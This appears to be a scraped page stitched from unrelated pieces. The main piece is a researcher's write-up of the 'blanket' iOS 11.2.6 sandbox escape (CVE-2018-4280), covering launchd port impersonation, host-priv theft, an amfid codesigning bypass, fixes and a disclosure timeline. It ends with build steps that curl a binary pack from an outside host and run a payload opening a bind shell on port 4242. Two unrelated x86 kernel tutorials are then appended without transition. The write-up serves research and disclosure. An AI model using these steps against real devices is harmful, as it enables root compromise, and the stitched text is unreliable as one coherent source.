App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASHEXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identitymessage that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the «task» port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the «task» port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth putting later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of «vulnerabilities» would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. I decided to use a bug in libxpc that was already scheduled to be fixed for this purpose.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look atconvert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESSexception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damages itself.

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawnto launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.

Let’s write a Kernel with keyboard and screen support

origin text

Today, we will extend that kernel to include keyboard driver that can read the characters a-z and 0-9 from the keyboard and print them on screen.

Source code used for this article is available at Github repository — mkeykernel

We communicate with I/O devices using I/O ports. These ports are just specific address on the x86’s I/O bus, nothing more. The read/write operations from these ports are accomplished using specific instructions built into the processor.

 

Reading from and Writing to ports

read_port:
	mov edx, [esp + 4]
	in al, dx	
	ret

write_port:
	mov   edx, [esp + 4]    
	mov   al, [esp + 4 + 4]  
	out   dx, al  
	ret

I/O ports are accessed using the in and out instructions that are part of the x86 instruction set.

In read_port, the port number is taken as argument. When compiler calls your function, it pushes all its arguments onto the stack. The argument is copied to the register edx using the stack pointer. The register dx is the lower 16 bits of edx. The in instruction here reads the port whose number is given by dx and puts the result in al. Register al is the lower 8 bits of eax. If you remember your college lessons, function return values are received through the eax register. Thus read_port lets us read I/O ports.

write_port is very similar. Here we take 2 arguments: port number and the data to be written. The out instruction writes the data to the port.

 

Interrupts

Now, before we go ahead with writing any device driver; we need to understand how the processor gets to know that the device has performed an event.

The easiest solution is polling — to keep checking the status of the device forever. This, for obvious reasons is not efficient and practical. This is where interrupts come into the picture. An interrupt is a signal sent to the processor by the hardware or software indicating an event. With interrupts, we can avoid polling and act only when the specific interrupt we are interested in is triggered.

A device or a chip called Programmable Interrupt Controller (PIC) is responsible for x86 being an interrupt driven architecture. It manages hardware interrupts and sends them to the appropriate system interrupt.

When certain actions are performed on a hardware device, it sends a pulse called Interrupt Request (IRQ) along its specific interrupt line to the PIC chip. The PIC then translates the received IRQ into a system interrupt, and sends a message to interrupt the CPU from whatever it is doing. It is then the kernel’s job to handle these interrupts.

Without a PIC, we would have to poll all the devices in the system to see if an event has occurred in any of them.

Let’s take the case of a keyboard. The keyboard works through the I/O ports 0x60 and 0x64. Port 0x60 gives the data (pressed key) and port 0x64 gives the status. However, you have to know exactly when to read these ports.

Interrupts come quite handy here. When a key is pressed, the keyboard gives a signal to the PIC along its interrupt line IRQ1. The PIC has an offset value stored during initialization of the PIC. It adds the input line number to this offset to form the Interrupt number. Then the processor looks up a certain data structure called the Interrupt Descriptor Table (IDT) to give the interrupt handler address corresponding to the interrupt number.

Code at this address is then run, which handles the event.

Setting up the IDT

struct IDT_entry{
	unsigned short int offset_lowerbits;
	unsigned short int selector;
	unsigned char zero;
	unsigned char type_attr;
	unsigned short int offset_higherbits;
};

struct IDT_entry IDT[IDT_SIZE];

void idt_init(void)
{
	unsigned long keyboard_address;
	unsigned long idt_address;
	unsigned long idt_ptr[2];

	/* populate IDT entry of keyboard's interrupt */
	keyboard_address = (unsigned long)keyboard_handler; 
	IDT[0x21].offset_lowerbits = keyboard_address & 0xffff;
	IDT[0x21].selector = 0x08; /* KERNEL_CODE_SEGMENT_OFFSET */
	IDT[0x21].zero = 0;
	IDT[0x21].type_attr = 0x8e; /* INTERRUPT_GATE */
	IDT[0x21].offset_higherbits = (keyboard_address & 0xffff0000) >> 16;
	

	/*     Ports
	*	 PIC1	PIC2
	*Command 0x20	0xA0
	*Data	 0x21	0xA1
	*/

	/* ICW1 - begin initialization */
	write_port(0x20 , 0x11);
	write_port(0xA0 , 0x11);

	/* ICW2 - remap offset address of IDT */
	/*
	* In x86 protected mode, we have to remap the PICs beyond 0x20 because
	* Intel have designated the first 32 interrupts as "reserved" for cpu exceptions
	*/
	write_port(0x21 , 0x20);
	write_port(0xA1 , 0x28);

	/* ICW3 - setup cascading */
	write_port(0x21 , 0x00);  
	write_port(0xA1 , 0x00);  

	/* ICW4 - environment info */
	write_port(0x21 , 0x01);
	write_port(0xA1 , 0x01);
	/* Initialization finished */

	/* mask interrupts */
	write_port(0x21 , 0xff);
	write_port(0xA1 , 0xff);

	/* fill the IDT descriptor */
	idt_address = (unsigned long)IDT ;
	idt_ptr[0] = (sizeof (struct IDT_entry) * IDT_SIZE) + ((idt_address & 0xffff) << 16);
	idt_ptr[1] = idt_address >> 16 ;

	load_idt(idt_ptr);
}

We implement IDT as an array comprising structures IDT_entry. We’ll discuss how the keyboard interrupt is mapped to its handler later in the article. First, let’s see how the PICs work.

Modern x86 systems have 2 PIC chips each having 8 input lines. Let’s call them PIC1 and PIC2. PIC1 receives IRQ0 to IRQ7 and PIC2 receives IRQ8 to IRQ15. PIC1 uses port 0x20 for Command and 0x21 for Data. PIC2 uses port 0xA0 for Command and 0xA1 for Data.

The PICs are initialized using 8-bit command words known as Initialization command words (ICW). See this link for the exact bit-by-bit syntax of these commands.

In protected mode, the first command you will need to give the two PICs is the initialize command ICW1 (0x11). This command makes the PIC wait for 3 more initialization words on the data port.

These commands tell the PICs about:

* Its vector offset. (ICW2)
* How the PICs wired as master/slaves. (ICW3)
* Gives additional information about the environment. (ICW4)

The second initialization command is the ICW2, written to the data ports of each PIC. It sets the PIC’s offset value. This is the value to which we add the input line number to form the Interrupt number.

PICs allow cascading of their outputs to inputs between each other. This is setup using ICW3 and each bit represents cascading status for the corresponding IRQ. For now, we won’t use cascading and set all to zeroes.

ICW4 sets the additional enviromental parameters. We will just set the lower most bit to tell the PICs we are running in the 80×86 mode.

Tang ta dang !! PICs are now initialized.

 

Each PIC has an internal 8 bit register named Interrupt Mask Register (IMR). This register stores a bitmap of the IRQ lines going into the PIC. When a bit is set, the PIC ignores the request. This means we can enable and disable the nth IRQ line by making the value of the nth bit in the IMR as 0 and 1 respectively. Reading from the data port returns value in the IMR register, and writing to it sets the register. Here in our code, after initializing the PICs; we set all bits to 1 thereby disabling all IRQ lines. We will later enable the line corresponding to keyboard interrupt. As of now, let’s disable all the interrupts !!

Now if IRQ lines are enabled, our PICs can receive signals via IRQ lines and convert them to interrupt number by adding with the offset. Now, we need to populate the IDT such that the interrupt number for the keyboard is mapped to the address of the keyboard handler function we will write.

Which interrupt number should the keyboard handler address be mapped against in the IDT?

The keyboard uses IRQ1. This is the input line 1 of PIC1. We have initialized PIC1 to an offset 0x20 (see ICW2). To find interrupt number, add 1 + 0x20 ie. 0x21. So, keyboard handler address has to be mapped against interrupt 0x21 in the IDT.

So, the next task is to populate the IDT for the interrupt 0x21.
We will map this interrupt to a function keyboard_handler which we will write in our assembly file.

Each IDT entry consist of 64 bits. In the IDT entry for the interrupt, we do not store the entire address of the handler function together. We split it into 2 parts of 16 bits. The lower bits are stored in the first 16 bits of the IDT entry and the higher 16 bits are stored in the last 16 bits of the IDT entry. This is done to maintain compatibility with the 286. You can see Intel pulls shrewd kludges like these in so many places !!

In the IDT entry, we also have to set the type — that this is done to trap an interrupt. We also need to give the kernel code segment offset. GRUB bootloader sets up a GDT for us. Each GDT entry is 8 bytes long, and the kernel code descriptor is the second segment; so its offset is 0x08 (More on this would be too much for this article). Interrupt gate is represented by 0x8e. The remaining 8 bits in the middle has to be filled with all zeroes. In this way, we have filled the IDT entry corresponding to the keyboard’s interrupt.

Once the required mappings are done in the IDT, we got to tell the CPU where the IDT is located.
This is done via the lidt assembly instruction. lidt take one operand. The operand must be a pointer to a descriptor structure that describes the IDT.

The descriptor is quite straight forward. It contains the size of IDT in bytes and its address. I have used an array to pack the values. You may also populate it using a struct.

We have the pointer in the variable idt_ptr and then pass it on to lidt using the function load_idt().

load_idt:
	mov edx, [esp + 4]
	lidt [edx]
	sti
	ret

Additionally, load_idt() function turns the interrupts on using sti instruction.

Once the IDT is set up and loaded, we can turn on keyboard’s IRQ line using the interrupt mask we discussed earlier.

void kb_init(void)
{
	/* 0xFD is 11111101 - enables only IRQ1 (keyboard)*/
	write_port(0x21 , 0xFD);
}

 

Keyboard interrupt handling function

Well, now we have successfully mapped keyboard interrupts to the function keyboard_handler via IDT entry for interrupt 0x21.
So, everytime you press a key on your keyboard you can be sure this function is called.

keyboard_handler:                 
	call    keyboard_handler_main
	iretd

This function just calls another function written in C and returns using the iret class of instructions. We could have written our entire interrupt handling process here, however it’s much easier to write code in C than in assembly — so we take it there.
iret/iretd should be used instead of ret when returning control from an interrupt handler to a program that was interrupted by an interrupt. These class of instructions pop the flags register that was pushed into the stack when the interrupt call was made.

void keyboard_handler_main(void) {
	unsigned char status;
	char keycode;

	/* write EOI */
	write_port(0x20, 0x20);

	status = read_port(KEYBOARD_STATUS_PORT);
	/* Lowest bit of status will be set if buffer is not empty */
	if (status & 0x01) {
		keycode = read_port(KEYBOARD_DATA_PORT);
		if(keycode < 0)
			return;
		vidptr[current_loc++] = keyboard_map[keycode];
		vidptr[current_loc++] = 0x07;	
	}
}

We first signal EOI (End Of Interrput acknowlegment) by writing it to the PIC’s command port. Only after this; will the PIC allow further interrupt requests. We have to read 2 ports here — the data port 0x60 and the command/status port 0x64.

We first read port 0x64 to get the status. If the lowest bit of the status is 0, it means the buffer is empty and there is no data to read. In other cases, we can read the data port 0x60. This port will give us a keycode of the key pressed. Each keycode corresponds to each key on the keyboard. We use a simple character array defined in the file keyboard_map.h to map the keycode to the corresponding character. This character is then printed on to the screen using the same technique we used in the previous article.

In this article for the sake of brevity, I am only handling lowercase a-z and digits 0-9. You can with ease extend this to include special characters, ALT, SHIFT, CAPS LOCK. You can get to know if the key was pressed or released from the status port output and perform desired action. You can also map any combination of keys to special functions such as shutdown etc.

You can build the kernel, run it on a real machine or an emulator (QEMU) exactly the same way as in the earlier article (its repo).

Start typing !!

kernel running with keyboard support

 

References and Thanks

  1. 1. wiki.osdev.org
  2. 2. osdever.net

 

 

Let’s write a Kernel

origin text

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well defined values after power-on. The Instruction Pointer (EIP) register holds the memory address for the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0. It is in fact, the last 16 bytes of the 32-bit address space. This memory address is called reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution.  BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine if the device is bootable or not. (whether bytes 511 and 512 of first sector are 0xAA55)

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; and then jumps into the address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

